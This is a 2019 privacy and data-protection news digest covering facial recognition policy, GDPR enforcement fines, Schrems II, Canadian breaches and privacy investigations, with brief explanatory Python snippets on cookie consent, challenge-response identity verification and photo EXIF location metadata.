On July 10 the House Homeland Security Committee is holding a hearing to question officials with the Transportation Security Administration, Customs and Border Protection, and the Secret Service about the agencies’ broad use of the technology in the US [read hearing details & watch]. In advance of the hearing, two public campaigns were launched against the use of facial recognition on the general public. In a letter to the committee dated July 9, the Electronic Privacy Information Center [EPIC], Electronic Frontier Foundation [EFF], Mijente and others said: “The use of face recognition technology by the DHS poses serious risks to privacy and civil liberties, threatens immigrants, broadly impacts American citizens, and has been implemented without proper safeguards in place or explicit Congressional approval. The technology is being deployed today by authoritarian governments as a tool to suppress speech and monitor critics, minorities, and everyday citizens. Congress should not permit the continued use of face recognition in the United States absent safeguards to prevent such abuses.” Meanwhile, digital rights group Fight for the Future launched a website calling for a complete federal ban on facial recognition [see here]. Evan Greer, deputy director of Fight for the Future, said: “People shouldn’t be subjected to authoritarian government surveillance just because their local city council failed to act. Congress has the authority to impose basic limits on what law enforcement across the country can do. There’s a reason your local police department doesn’t have access to missiles and carpet bombs. Congress should act now to ban this uniquely dangerous surveillance weapon.” [BuzzFeed]

US – Facial-Recognition Use by Federal Agencies Draws Lawmakers’ Anger

State and federal lawmakers are calling for new rules and investigations surrounding the use of facial-recognition scans of driver’s license databases by Immigration and Customs Enforcement and other agencies, fueling a debate over the technology some on Capitol Hill have said represents a “massive breach of privacy and trust.” Public records obtained by Georgetown Law’s Center on Privacy and Technology and first reported Sunday by The Washington Post revealed how ICE, the FBI and other agencies had worked for years with state officials to search through millions of license photos without drivers’ knowledge or consent. The House Homeland Security Committee is expected to discuss possible guardrails on Wednesday during the third congressional hearing in as many months over the largely unregulated technology, which has faced bipartisan resistance due to concerns over false arrests, public surveillance and government misuse. Revelations about the scale of federally requested face scans have sparked anger in Congress, with Rep. Zoe Lofgren (D-Calif.) saying in a statement to The Post that the facial-recognition searches marked “a massive, unwarranted intrusion into the privacy rights of Americans by the federal government, done secretly and without authorization by law.” “Americans don’t expect — and certainly don’t consent — to be surveilled just because they get a license or ID card,” Sen. Patrick J. Leahy (D-Vt.) said in a tweet. “This has to stop.” [In contrast] Rep. Mike D. Rogers (Ala.), the top Republican on the Homeland Security committee, said in a statement to The Post that Department of Motor Vehicles photos should remain available to law enforcement and “should be used in our fight against terrorists, criminals and violent international cartels.” Congress, Rogers added, “should focus on making sure [the Department of Homeland Security] and other departments are using the most accurate and effective facial recognition technology available.” [The Washington Post]

EU – Privacy Regulators Seek to Clamp Down on Facial-Recognition Tech

EU privacy regulators have discussed the launch of a new set of guidelines to increase restrictions on facial-recognition software. A priority with the guidelines would be to redefine the data collected by facial-recognition tech as “biometric data.” A change in verbiage would place the information under the “sensitive data” category of the EU General Data Protection Regulation. The GDPR requires explicit consent for sensitive data collections. The change through these proposed guidelines would hinder the use of facial recognition, as those using the technology would need to do more than post general public notices or alerts regarding the software’s use. [Politico]

US – Second City Bans Government Use of Facial Recognition Technology

On Friday, June 28 the City of Somerville, Massachusetts (home of Tufts University) banned governmental use of facial recognition technology. The resolution was approved by an 11-0 vote of the City Council. The resolution compares the broad application of facial surveillance technologies to “requiring every person to carry and display a personal photo identification card at all times,” noting potential disparate impacts on women, young people, and people of color. The resolution bars the City and anyone acting on the City’s behalf from using facial recognition technology or using any information obtained from facial recognition technology. Somerville is only the second municipality in the nation to have enacted such a ban, with San Francisco having done so in May of this year [see San Francisco’s Board of Supervisors meeting details, agenda, minutes & ordinance]. Bills that would ban the governmental use of facial identification technology throughout the Commonwealth of Massachusetts are currently pending in both houses of the state legislature, though the prospects of the bills passing are unclear [specifically, Senate Bill No. S.1385 and House Bill No. H.1538 would place a moratorium on government use of face surveillance]. Other states are considering similar bans as well. Somerville’s move to restrict the government use of facial recognition technology is a reminder that questions of the potentials and pitfalls of biometric technology extend not just to consumer/business and employee/employer relationships, but also to the relationship between citizens and government. [Security, Privacy and the Law (Foley Hoag) | Massachusetts Can Become a National Leader to Stop Face Surveillance | Leading police bodycam manufacturer bans facial recognition technology | Vice]

Big Data / Data Analytics / Artificial Intelligence

WW – AI, Machine Learning Have Impacted Pre-Fill Data in Canada

A new study reports on the effect artificial intelligence and machine learning have had on pre-fill data in the country. Opta Information Intelligence has used its property insurance valuation service over the past 10 years to pre-fill approximately 90% of Canadian business quotes. Opta President Greg McCutcheon said AI and machine learning have helped to make the pre-filled information much more accurate. “We’ve been able to train computers to recognize the type of construction and features about that home by gathering information through imagery,” said McCutcheon, who added the techniques are particularly accurate when powered by data collected in urban areas. [Canadian Underwriter]

Canada

CA – Privacy Concerns Arise Over BC Community’s Security Camera Program

The City of Parksville on Vancouver Island is offering a one-time rebate of up to $100 for residents and business owners who install cameras on their property in an effort to reduce crime — a program that is raising eyebrows among privacy advocates [watch here 2 min]. City council has allocated $2,500 for the program this year, with plans to double that fund to $5,000 for 2020. All that’s needed is an application form and a receipt for the camera’s purchase and installation; cameras are only eligible if they were purchased on or after July 2. But the BC Freedom of Information and Privacy Association (BCFIPA) said public education and consultation are needed to prevent Parksville from becoming a city where every corner is covered by cameras. “It opens it up to make it easy for everyone to just put cameras in their backyard and it becomes an acceptable practice,” said Sara Neuert, the association’s executive director. [Global News]

CA – OPC Launches Investigation into Desjardins Breach

The Office of the Privacy Commissioner of Canada and Québec Access to Information Commission announced they have launched an investigation into the Desjardins Group data breach. The OPC will look to determine whether the financial institution had complied with the Personal Information Protection and Electronic Documents Act and Québec’s Act Respecting the Protection of Personal Information in the Private Sector. In response to a call from Conservative Leader Andrew Scheer, the House of Commons will host an emergency hearing on the breach “in the next week or so,” according to Committee Chair MP John McKay. [priv.gc.ca]

CA – OPC Asked to Investigate Vehicle Data Collection

The Freedom of Information and Privacy Association has asked the Office of the Privacy Commissioner of Canada to investigate the data collection practices of vehicles within the country. In addition to the complaint, the group also sent the OPC a new version of its 2015 “The Connected Car” report. The study examined the privacy practices of 36 vehicle manufacturers to see what data they collected and how it was used. “Some things are better than they were,” said Vincent Gogolek, the association’s former executive director. “But some of the major problems that we had back in 2015 are still being seen today.” Meanwhile, Apple has placed privacy-themed billboards around Toronto. [Vancouver Sun]

CA – SK OIPC Recommends Cannabis Dispensaries to Fall Under HIPA

As part of its annual report, the Office of the Saskatchewan Information and Privacy Commissioner proposes that cannabis dispensaries be subject to the Health Information Protection Act. The commissioner’s office recommends the term “trustee” within the act be amended to include “corporations or persons which operate a facility providing a health service including massage therapists and cannabis dispensaries.” “To some extent it depends on how much the dispensary is collecting, but it does strike us that if they’re collecting information on your purchases of marijuana then at least they have the obligation to safeguard that information,” Saskatchewan Information and Privacy Commissioner Ron Kruzeniski wrote. [Regina Leader-Post]

EU Developments

EU – Schrems II Heard In Europe: Potential Huge Impact on Global Data Transfers

On July 9 the Court of Justice of the European Union [CJEU] heard oral submissions in the latest case questioning the legal validity of international data transfer mechanisms under the GDPR [the case is C-311/18: see docket], such as Standard Contractual Clauses and the EU-US Privacy Shield. The Irish Data Protection Commissioner [DPC] is seeking a ruling that would find the so-called Standard Contractual Clauses, which are used to legitimise the transfer of personal data from Europe all around the world, invalid because they do not provide adequate protection for individuals’ data. The CJEU heard from the DPC, Facebook, the Electronic Privacy Information Center, DigitalEurope, the Business Software Alliance, the European Commission, the European Data Protection Board, the US government, several EU Member States and representatives of the original complainant, Max Schrems. If the Standard Contractual Clauses are declared invalid, this will have a huge impact on global trade, effectively putting the brakes on the international transfer of data. For his part, it became clear during the oral submissions that Mr Schrems himself does not wish the Standard Contractual Clauses to be declared invalid; he is asking the DPC to ensure that it enforces the clauses instead. However, questions remain regarding the ability of importing organisations to comply with the requirements of the Standard Contractual Clauses because of the access that certain foreign law enforcement agencies can have to data held in their jurisdiction. Similarly, if an organisation is unable to comply with the Standard Contractual Clauses, it follows that the same may apply to the EU-US Privacy Shield, which is why that mechanism may also be considered. The CJEU’s Advocate General has said he will give his non-binding opinion on the case on 12 December this year, with a full decision expected from the CJEU by early 2020. It is difficult to predict what the outcome will be, but the impact on global trade should the Standard Contractual Clauses and the Privacy Shield be found invalid should not be underestimated. In the commercial context, such a decision would leave companies with very little option to transfer personal data overseas other than seeking consent from the individuals in question, something which is likely to be impractical in almost all circumstances and not possible in certain cases. For example, the GDPR makes it clear that employee consent is rarely likely to be valid, meaning that companies would not be able to rely on it to transfer employee personal data out of the EU. [Data Notes (Herbert Smith Freehills) | The Schrems Saga Continues: Schrems II Case Heard Before the CJEU | Facebook Faces Activist, EU Judges in ‘Schrems II’ Privacy Case | EU postpones ruling on Schrems II; Facebook warns of trade disruption]

UK – ICO Releases 2018–19 Annual Report

The U.K. Information Commissioner’s Office released its annual report for 2018–19. The agency received 41,661 data protection complaints over a 12-month span that ended March 31, up from the 21,019 complaints it received in the 2017–18 period. U.K. Information Commissioner Elizabeth Denham called the arrival of the EU General Data Protection Regulation “the biggest moment of the year,” as the agency cited its work with businesses to help implement the law as a highlight in the report. “This saw people wake up to the potential of their personal data, leading to greater awareness of the role of the regulator when their data rights aren’t being respected,” Denham wrote. “The doubling of concerns raised with our office reflects that.” [ICO.org.uk]

UK – ICO Offers Input on UK Online Harms White Paper

The U.K. Information Commissioner’s Office has published a response to the Department for Digital, Culture, Media & Sport’s consultation on the “Online Harms White Paper.” “The impact of online harms is an issue of significant public concern,” the ICO said in its response. “It is essential that we have regulation that makes a real difference, but also remains proportionate so that people are able to continue to enjoy the real benefits of the internet.” The response went on to address the need for innovative solutions and for considering regulation in its full scope. Considerations for data protection and duty of care were also highlighted. [ICO.org.uk]

UK – ICO Updates Guidance on Cookies and Similar Technologies

On July 3 the ICO published new guidance on the use of cookies and a related “myth-busting” blog post, “Cookies – what does ‘good’ look like?”. Some of the “new” guidance really just repeats existing guidance, but other aspects may require organizations to review their current practices. This all comes hot on the heels of the ICO updating its own mechanism for obtaining consent to cookies on its website last week. The updated ICO guidance also follows the CNIL’s recent statement that it will issue new guidelines on cookies in two phases over the next 6 months [read English translation]: an update over the summer to amend its current guidance and rule out the use of implied consent to place cookies on users’ devices; and a consultation at the end of the year followed by new guidelines on how to obtain consent for the use of cookies (see summary). It seems likely that some or all of this national guidance may have to be revised yet again when the proposed ePrivacy Regulation [“Regulation on Privacy and Electronic Communications”] is finally agreed, although discussions on the proposal continue with no end currently in sight. The remainder of this post summarizes key points [of the ICO guidance], including in relation to when sites need to obtain consent, how to obtain consent, and when the rules apply to non-EU sites. [Inside Privacy (Covington) | Cookie consent – What “good” compliance looks like according to the ICO | Cookie Compliance: How can companies get it right when the regulator does not?]
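
To illustrate the consent model the guidance describes (strictly necessary cookies are exempt, while non-essential cookies such as analytics require a clear affirmative act), here is a minimal sketch in Python using Flask. The route and cookie names (“cookie_consent”, “analytics_id”) are illustrative assumptions, not anything prescribed by the ICO:

    # Minimal sketch: non-essential cookies are set only after opt-in.
    import uuid
    from flask import Flask, request, make_response

    app = Flask(__name__)

    @app.route("/")
    def index():
        resp = make_response("<a href='/accept-cookies'>Accept analytics cookies</a>")
        # Strictly necessary cookies (e.g., a session cookie) are exempt
        # from the consent requirement and may be set unconditionally.
        resp.set_cookie("session", uuid.uuid4().hex, httponly=True)
        # Analytics cookies are written only once the user has taken a
        # clear affirmative action -- implied consent is not enough.
        if request.cookies.get("cookie_consent") == "yes":
            resp.set_cookie("analytics_id", uuid.uuid4().hex)
        return resp

    @app.route("/accept-cookies")
    def accept_cookies():
        # Record the opt-in itself in a cookie; a real deployment would
        # also keep an auditable record of when consent was given.
        resp = make_response("Analytics cookies enabled.")
        resp.set_cookie("cookie_consent", "yes")
        return resp

The design point is simply that the analytics cookie can never be written before the opt-in cookie exists, mirroring the guidance’s rejection of pre-ticked boxes and implied consent.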

UK – ICO Fines British Airways a Record £183M Over GDPR Breach that Leaked Data from 500,000 Users

On July 8 the U.K. Information Commissioner’s Office announced its intention to fine British Airways and its parent International Airlines Group (IAG) £183.39 million [that’s $301 million Cdn or $230 million US as of this date] in connection with a data breach that took place last year and affected 500,000 customers browsing and booking tickets online [read ICO announcement here & BBC extended coverage here]. The fine — 1.5% of BA’s total revenues for the year that ended December 31, 2018 — is the highest the ICO has ever leveled at a company over a data breach (previous “record holder” Facebook was fined a mere £500,000 last year by comparison) and relates to infringements of the General Data Protection Regulation [GDPR]. The incident involved malware on BA.com that diverted user traffic to a fraudulent site, where customer details were subsequently harvested by the malicious hackers. The ICO said that it found “that a variety of information was compromised by poor security arrangements at BA, including log in, payment card, and travel booking details as well as name and address information.” BA notified the ICO of the incident in September, but the breach is believed to have begun in June. Since then, the ICO said, British Airways “has cooperated with the ICO investigation and has made improvements to its security arrangements since these events came to light.” Market reaction was swift, with IAG seeing volatile trading in London and shares down 1.5% at the time of writing. And it sounds like BA will try to appeal the fine and overall ruling. In a statement to the market [read here], the two leaders of IAG defended the company and said that its own investigations found no evidence of fraudulent activity on accounts linked to the theft. Alex Cruz, British Airways chairman and chief executive, said: “We are surprised and disappointed in this initial finding from the ICO. British Airways responded quickly to a criminal act to steal customers’ data. We have found no evidence of fraud/fraudulent activity on accounts linked to the theft. We apologise to our customers for any inconvenience this event caused.” Willie Walsh, International Airlines Group chief executive, said: “British Airways will be making representations to the ICO in relation to the proposed fine. We intend to take all appropriate steps to defend the airline’s position vigorously, including making any necessary appeals.” [TechCrunch | UK regulator to hit British Airways with record fine over 2018 hack | A Huge Data Breach Fine Against British Airways Is a Warning to Global Execs | Intention to fine British Airways £183.39m under GDPR for data breach | British Airways faces record £183m fine for data breach | UK data regulator threatens British Airways with 747-sized fine for massive personal data blurt | GDPR: Record British Airways fine shows how data protection legislation is beginning to bite | GDPR: British Airways faces record £183m fine for customer data breach | British Airways fined $229 million under GDPR for data breach tied to Magecart | Post-Data Breach, British Airways Slapped With Record $230M Fine]

UK – ICO Fines Marriott £99M for GDPR Violations

The U.K. Information Commissioner’s Office issued a notice of its intention to fine Marriott International 99 million GBP for violations of the EU General Data Protection Regulation related to its November 2018 data breach [Marriott notice]. The ICO released the statement in response to a filing Marriott made with the U.S. Securities and Exchange Commission. An ICO investigation found Marriott did not take the proper precautions when it acquired the Starwood hotels group in 2016; Starwood’s systems had been compromised in 2014. Marriott will have a chance to make representations to the ICO over its findings. The announcement comes shortly after the ICO issued a similar notice to British Airways for GDPR infractions. [ICO.org.uk | NakedSecurity (Sophos) | Marriott/Starwood Data Breach: ICO intention to issue another big £99 million ‘mega fine’ | ICO Announces $124 Million Fine for Marriott International following Data Breach]

EU – EDPB Issues Best Practices for Video Surveillance

The European Data Protection Board has opened a public consultation on guidelines for personal data processing through video devices; comments can be submitted until September 6, 2019. Highlights: implement data protection by design and default as soon as surveillance is planned (default privacy settings, built-in privacy enhancing technologies); use a combination of methods to ensure transparency (warning signs and complete information sheets); implement risk mitigation measures (encryption, compartmentalisation, effective raw data deletion); do not implement surveillance for fictional or speculative protection of property or people (there must be a real, hazardous situation); and do not condition service access on acceptance of biometric processing. [EDPB – Guidelines 3/2019 on Processing of Personal Data Through Video Devices]

EU – German State Bans Office 365 in Schools over Privacy Concerns

The German state of Hesse has banned the use of Microsoft Office 365 in its schools, citing privacy concerns. The Hessian data protection commissioner wrote that using the cloud suite could expose student and teacher information to US officials. Microsoft Office 365 sends telemetry data to the US; those data have been found to contain all sorts of information, from system diagnostics to sentences lifted from documents. Sources: arstechnica.com: Office 365 declared illegal in German schools due to privacy risks | www.zdnet.com: Microsoft Office 365: Banned in German schools over privacy fears

EU – CNIL Puts More Pressure on the Adtech Sector

Last year, the French Data Protection Authority [CNIL] issued formal notices against four companies in the adtech sector, namely Fidzup, Singlespot, Teemo and Vectaury, ordering them to comply with the GDPR [for detail on this, read here]. The CNIL eventually dropped its investigations against these companies after concluding that they had made sufficient efforts to comply with the GDPR. This was just a prelude of what is to come. On 28 June 2019, the CNIL issued a statement on its website which says in bold letters that online advertising is a “top priority” for 2019 [read in French here & English translation here]. This leaves little room for doubt: the CNIL is not done with the adtech business and, on the contrary, is just warming up. [The remainder of this post posits what the adtech sector should expect in 2019 on this front] [Privacy, Security and Information Law (FieldFisher)]

EU – Irish DPC Assessing Possible Google Data Breach

The Irish Data Protection Commission is weighing whether it will launch an investigation into a possible data breach of Google. The tech giant filed a data breach notification to the DPC last week following reports out of Belgium that contractors had been able to listen to users’ audio from Google Assistant. “We just learned that one of these language reviewers has violated our data security policies by leaking confidential Dutch audio data,” Google said in a blog post responding to the Belgian reports. “Our security and privacy response teams have been activated on this issue, are investigating, and we will take action. We are conducting a full review of our safeguards in this space to prevent misconduct like this from happening again.” [Bloomberg]

UK – ICO’s Regulatory Sandbox Points to a Future of Pro-Active Engagement

As companies continue to grapple with interpreting how the GDPR’s principles apply to their own businesses, in particular contexts, there is a growing need for data protection regulators to provide clarity on the practical application of the regulation. In the UK, the Information Commissioner has recently taken steps to address these concerns through the announcement of a ‘Regulatory Sandbox’. Sandboxes offer a formal structure for constructive engagement between a regulator and the parties being regulated, allowing for collaboration and the exchange of ideas. The ICO intends to use it to support organisations that are looking to use personal data in innovative ways through the use of new technologies and approaches. The scheme is open to companies ranging from multi-national organisations to start-ups. It offers the opportunity to receive free, professional expertise and support from the ICO on complying with the GDPR and UK Data Protection Act 2018 during the course of developing products and services. In the immediate term the Sandbox will be limited to approximately ten organisations that are selected from a pool of applicants [the application period is now closed]. These organisations will participate in the beta phase, which is due to run from July 2019 until September 2020. During this period the ICO has committed to offering assistance with concept design and prototyping, informal supervision of testing processes and a series of drop-in workshops. Once a participant’s involvement concludes, they can request that the ICO provide a statement of regulatory comfort which aims to provide assurances regarding the product or service’s compliance with data protection laws. The expectation is that, within the next 12-18 months, the ICO’s scheme will be rolled out to a much wider population of organisations. Applicants will be prioritised based on certain eligibility criteria, namely the public benefit offered by the proposal, the ability to demonstrate that the product or service is genuinely innovative (and not just business as usual) and the organisation’s fitness to participate. This post also discusses: 1) the Sandbox as an alternative approach to regulatory engagement; and 2) how sandboxes have worked in other industries. [Chronicle of Data Protection (Hogan Lovells)]

FOI

CA – OIPC SK Updates Its Dictionary

The Office of the Saskatchewan Information and Privacy Commissioner has updated its dictionary of common terms and phrases used in access requests. Some of the terms and phrases commonly used in requests under FOIP, LA FOIP and HIPA have been updated, including “accurate” (provide sufficient and correct information), “complete” (be comprehensive and not leave any gaps in responses), and “open” (be transparent about how decisions are made and searches conducted, and explain confusing information). [OIPC SK – Blog – Our Dictionary Has Been Updated – the Dictionary]

Health / Medical

CA – Smartphone Recordings Creating Headaches in the ER

According to a new study by Dr. James Stempien, provincial head of emergency medicine in the Saskatchewan Health Authority, and three colleagues [see: Self-documentary in the emergency department: Perspectives on patients recording their own procedures – abstract & access here] more people are asking to record their own emergency procedures, a self-documentary trend that’s creating controversy among medical staff. The study found that most patients (62%) believed they should be allowed to video record their emergency procedures, versus 28% of emergency department (ED) doctors and nurses. “Contrary to patients’ views, clinicians were not in favour of allowing audio or video recordings in the ED,” they reported in the Canadian Journal of Emergency Medicine. Doctors had concerns around consent, staff and patient privacy, covert recordings, and legal issues. They worried that patients might use the video against them if they were unhappy with their care. (The recording could be considered part of the medical record.) Some worried about performance anxiety, though the researchers looked for, but couldn’t find, research as to whether doctors perform worse if they know they’re being recorded. [National Post]

Horror Stories

CA – More Than 50K Desjardins Members Sign Petition Demanding New SINs

More than 50,000 people have signed a petition demanding new social insurance numbers in the wake of a massive data breach at Desjardins Group. This comes after a Desjardins employee with “ill-intention” collected the data of nearly three million people and businesses. He then shared that data with others, officials revealed in late June [read company PR’s here & here]. The leaked information includes names, addresses, birth dates, social insurance numbers, email addresses and information about transaction habits, but no passwords, security questions or personal identification numbers. Still, people are worried and that worry will last a lifetime if nothing is done because identities can be stolen at any time, said Pierre Langlois. That’s why he launched an online petition calling on the government to issue new SINs to all of those affected. “We ask that the government propose a quick solution to this problem, which may include the replacement of the social insurance number of all those who have been victims of this theft, which are known and easily identifiable,” the petition says. Replacing the stolen SINs would be the “least the Canadian government could do to help restore some peace of mind to the victims,” it continues. The Government of Canada is committed to protecting social insurance numbers against fraud and misuse, as well as protecting the privacy of Canadians, according to a spokesperson for the minister of families, children and social development, Jean-Yves Duclos. Duclos is not accepting or refusing the petition’s request at this point. “We believe that any security breach affecting SIN information is very serious,” wrote the spokesperson in an email to Radio-Canada. “Our government is in communication with the Autorité des marchés financiers (AMF) to provide all the necessary support on this file.” [CBC News | Desjardins offers more protection to data theft victims | Desjardins says personal info of 2.9 million members shared illegally by employee | Personal data of 2.7 million people leaked from Desjardins]

Identity Issues

WW – NIST Publishes Considerations for Emerging Identity Management Systems

The US National Institute of Standards and Technology (NIST) discussed blockchain identity management systems (IDMSs) in a new paper. The white paper highlights relevant security and privacy considerations, such as private data leaks, metadata tracing, flawed smart contracts, and private key compromise, and offers mitigation protocols for identity management (e.g., user-friendly identity wallets, challenge response protocols, and encryption). [NIST – Cybersecurity White Paper Draft – A Taxonomic Approach to Understanding Emerging Blockchain Identity Management Systems]
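
As a concrete illustration of one mitigation the paper names, the sketch below shows a challenge-response proof of key possession in Python (using the third-party cryptography package). It is a generic sketch of the technique, not code from the NIST paper; the key pair stands in for the keys a user’s identity wallet would hold:

    import os
    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives.asymmetric import ed25519

    # Wallet side: the blockchain identity is anchored to this key pair;
    # the public key would be published (e.g., in a DID document).
    private_key = ed25519.Ed25519PrivateKey.generate()
    public_key = private_key.public_key()

    # Verifier side: issue a fresh random challenge to prevent replay.
    challenge = os.urandom(32)

    # Wallet side: prove possession by signing the challenge; the
    # private key itself never leaves the wallet.
    signature = private_key.sign(challenge)

    # Verifier side: accept the identity claim only if the signature
    # verifies against the published public key.
    try:
        public_key.verify(signature, challenge)
        print("Proof of key possession verified.")
    except InvalidSignature:
        print("Verification failed.")

This is also why the paper flags private key compromise as a central risk: anyone holding the key can pass the same proof.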

US – IP Address: NY Court Finds No Expectation of Privacy

A New York District Court considered whether IP address information obtained by law enforcement must be suppressed. It held that law enforcement did not need a warrant to obtain IP address information about a suspect from a telecom; the cellphone app that provided the IP address information was installed by the suspect, and did not allow for tracking outside his home or surveillance of his daily movements. [USA v. Lloyd Kidd – 2019 U.S. Dist. LEXIS 114627 – US District Court for the Southern District of New York]

US – Mistaken Identifications Raise Privacy Concerns

There are a variety of home surveillance tools that provide homeowners a sense of security when they’re not at home. The downside to the surveillance is that some people have been mistakenly identified as criminals. In Ohio, a teenager was mistakenly identified as a thief after taking a package off a neighbor’s porch. The homeowner posted images of the teenager on social media and reported the incident to the police. It turns out the teenager was picking up a package delivered to the wrong home. One case resulted in litigation — the Ohio Supreme Court recently heard arguments about a CBS affiliate that aired a news story and mistakenly identified three siblings as “robbers” based on images pulled from park surveillance cameras. The affiliate refused to air a retraction, and the family sued the station. [Government Technology]

Law Enforcement

US – Miami Police Body Cam Videos Up for Sale on the DarkWeb

According to Jason Tate, CEO of Black Alchemy Solutions Group, a terabyte of videos from Miami Police Department body cams has been found sloshing around online for sale. The hoard of videos was stored in unprotected, internet-facing databases. Besides Miami Police, there’s video leaking from city police departments “all over the US”, he said. Miami Police Department removed the videos from public access after Tate notified them about his findings, but they were publicly accessible for at least several days. That gave ample opportunity for hackers to copy videos from the databases and potentially sell them. A spokesperson for Miami PD told The Register that the department is still looking into the claims and wouldn’t comment until it completed its review. [Naked Security (Sophos) | Cop a load of this: 1TB of police body camera videos found lounging around public databases]

WW – 83% of Readers Don’t Wipe Their Phones Before Travel

Many people say they travel internationally with potentially sensitive information on their phone — but Toronto lawyer Craig Penney says there’s no reason to do so. “I know many lawyers have chosen to avoid crossing the border with client information. There is no reason to,” Penney says in an email to Law Times. “You can store it in a secure cloud and access it later if needed. Better safe than sorry, I say.” Nearly 83 per cent of readers in a recent Law Times poll said they do not wipe all information off their devices before leaving Canada. A little over 17 per cent of readers told Law Times they do scrub their phones, laptops or tablets. Penney acted on a recent case, R. v. Singh, 2019 ONCJ 453, that dealt with the issue of privacy at the U.S.-Canada border. Justice Elaine Deluzio wrote in the decision, which involved a border agent searching a recent graduate’s phone for child pornography: “The evidence establishes that the Charter infringing state conduct in this case is serious, longstanding and systemic.” Deluzio noted that border officers have broad search powers through the Customs Act and the Immigration and Refugee Protection Act. Nevertheless, Canada Border Services Agency rules bar officers from searching devices “for the sole or primary purpose of looking for evidence of a Criminal Code offence. And yet that is exactly what happened in this case and happens routinely in cases when Border Officers find evidence of child pornography on cell phones and other devices.” Penney says: “For most of us, our phones are our primary communication and info storage device; for some, it’s the only such device. If you wanted to learn about someone, and you could access one thing belonging to her, what would it be — her phone, correct?” The Federation of Law Societies of Canada recently released guidelines for lawyers dealing with privacy at the border [see here & 9 pg PDF here – also see other related FLSC articles here]. The FLSC report said firms should create a policy about lawyers and staff who are travelling internationally with smartphones or laptops that contain confidential data, and that travel policies should be detailed in their retainer letter. Some firms provide separate “clean” laptops and phones for travel, the FLSC said in the report. It also advises lawyers to keep phones on airplane mode during the immigration process and to delete cloud-based apps, contacts and calendars before crossing the border. Penney says that lawyers must keep abreast of policies that may embolden border officers. “For lawyers, this means we must be cautious in what we have in our phones when we cross the border,” he says. [Law Times | U.S. border hassles: Tips for navigating a difficult situation | Canada Border Services Agency officers confiscate lawyer’s phone and laptop after he refuses to give up passwords | “Your phone is not safe at the border,” advocates warn after man’s electronic devices seized at Pearson Airport | Canada Border Services seizes lawyer’s phone, laptop for not sharing passwords]

Location

US – T-Mobile Claims Customers Unable to Sue Over Location Data Disclosures

A class-action claim against T-Mobile over location data disclosures is being held up in federal court after the phone carrier said customers had previously agreed to arbitrate all disputes rather than go to trial. T-Mobile filed a motion at a U.S. District Court in Maryland to either dismiss or stay the matter, saying “plaintiffs are contractually required to arbitrate individually, rather than litigate their claims in federal court, much less in a putative class action.” The motion refers to the clause in T-Mobile’s terms and conditions that requires individual arbitration unless customers opt out, which they can do during a 30-day window after opening their account. [MediaPost]

Online Privacy

WW – More Than 1K Android Apps Collect Data Even When Permission Is Denied

Researchers from the International Computer Science Institute found more than 1,000 Android apps gather data from devices “even after people explicitly denied them permission.” The apps used workarounds hidden in code that took personal data from Wi-Fi sources and metadata stored in phones, and in some cases accessed unprotected files on a device’s SD card. Google and the Federal Trade Commission were notified about the issues last September. Google said the issues would be addressed with the release of Android Q later this year. The full details of the 1,325 apps involved will be released in August. [CNET]
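
One documented class of workaround involved reading files that other apps leave on shared storage. Photos are a good example: a JPEG saved by any camera app routinely embeds GPS coordinates in its EXIF metadata, so an app that was denied the location permission but can read storage may still learn where its user has been. A small sketch of the idea in Python (assuming the Pillow package; the file path is hypothetical):

    from PIL import Image
    from PIL.ExifTags import GPSTAGS

    def gps_from_jpeg(path):
        """Return the raw GPS EXIF fields of a JPEG, if any."""
        exif = Image.open(path)._getexif() or {}
        # EXIF tag 34853 ("GPSInfo") holds a nested dict of GPS fields.
        gps_raw = exif.get(34853, {})
        return {GPSTAGS.get(tag, tag): value for tag, value in gps_raw.items()}

    print(gps_from_jpeg("/sdcard/DCIM/holiday.jpg"))  # hypothetical path
    # Typical output includes GPSLatitude and GPSLongitude, enough to
    # pinpoint where the photo was taken.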

WW – Apple Users Warned About iOS 13 Security and Privacy Problem

When the “Sign in with Apple” functionality slated to appear as part of iOS 13 was announced at the Worldwide Developers Conference (WWDC) back on June 3, it was met with broad approval from Apple users. After all, what’s not to like about having an alternative to signing in to applications and services via your Facebook, Google, or Twitter account? It turns out, truth be told, quite a lot. Just how much depends upon whom you are talking to, of course. The OpenID Foundation (OIDF), whose own OpenID Connect platform shares much in common with the proposed Apple solution and counts Google, Microsoft and PayPal amongst its members, is edging towards the not-so-keen side of the fence … In a June 27 open letter addressed to Craig Federighi, senior vice-president of software engineering at Apple, Nat Sakimura, OIDF chairman, begins with some faint praise regarding Apple’s “efforts to allow users to log in to third-party mobile and Web applications with their Apple ID using OpenID Connect.” It very quickly goes downhill from there, however. [Forbes]

WW – Facebook Launches Ad Transparency Tool

Facebook launched a new transparency tool earlier this week that tells users why particular ads appear in their newsfeed. The new feature, “Why Am I Seeing This Ad?,” also tells users how the ad is linked to an ad agency or data broker and how to opt out of ad campaigns run by third parties. “I think it is a good evolution of our transparency tools, and what we’re doing is listening to people’s feedback,” Facebook Director of Product Management Rob Leathern said. The tool will be rolled out to all users soon. [Buzzfeed News]

UK – CMA Says New Watchdog May Be Needed to Monitor Growth of Digital Platforms

The U.K.’s Competition and Markets Authority says a new regulator may be needed to monitor the “growing power of digital platforms.” The CMA launched an investigation into how online platforms use data to boost advertising revenue and market power. The competition authority is also considering a number of measures designed to increase consumer protection, such as a block on tech giants from sharing user data between apps. The CMA is also expected to review proposals for a new regulatory body with powers of enforcement. The CMA is seeking comments through July 30 and expects to publish a final report next year. [Financial Times]

Privacy (US)

US – FTC Commissioners Approve $5 Billion Facebook Settlement

The US Federal Trade Commission (FTC) has voted to approve a settlement with Facebook that fines the company US $5 billion over privacy issues related to the Cambridge Analytica scandal. The investigation centered on whether Cambridge Analytica’s acquisition of user information violated a 2012 consent decree with the FTC under which Facebook promised to better secure user data. The matter is now in the hands of the Justice Department’s civil division to be finalized. There are likely additional terms to the settlement, but they have not been made public. Sources: www.wsj.com: FTC Approves Roughly $5 Billion Facebook Settlement | www.scmagazine.com: Facebook to pony up $5 billion in FTC settlement | arstechnica.com: Facebook’s FTC fine will be $5 billion—or one month’s worth of revenue

US – Privacy Law Hampers State-to-State Exchanges of Problem Drivers: DMV

